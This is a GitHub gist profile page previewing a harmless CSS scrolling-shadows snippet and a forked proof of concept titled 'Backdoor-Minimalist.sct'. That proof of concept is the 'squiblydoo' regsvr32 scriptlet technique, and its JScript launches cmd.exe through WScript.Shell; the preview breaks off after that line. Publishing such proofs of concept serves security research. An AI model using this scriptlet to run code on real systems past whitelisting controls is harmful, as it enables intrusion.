Skip to content

Instantly share code, notes, and snippets.

View seyi's full-sized avatar
💭
Coding happily

seyi seyi

💭
Coding happily
  • Geomobile Nigeria
  • Nigeria
View GitHub Profile
@seyi
seyi / dabblet.css
Created August 20, 2022 12:47 — forked from LeaVerou/dabblet.css
Scrolling shadows by @kizmarh and @LeaVerou
/**
* Scrolling shadows by @kizmarh and @leaverou
* Only works in browsers supporting background-attachment: local; & CSS gradients
* Degrades gracefully
*/
html {
background: white;
font: 120% sans-serif;
}
@seyi
seyi / Backdoor-Minimalist.sct
Created April 26, 2016 11:04
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Empire"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");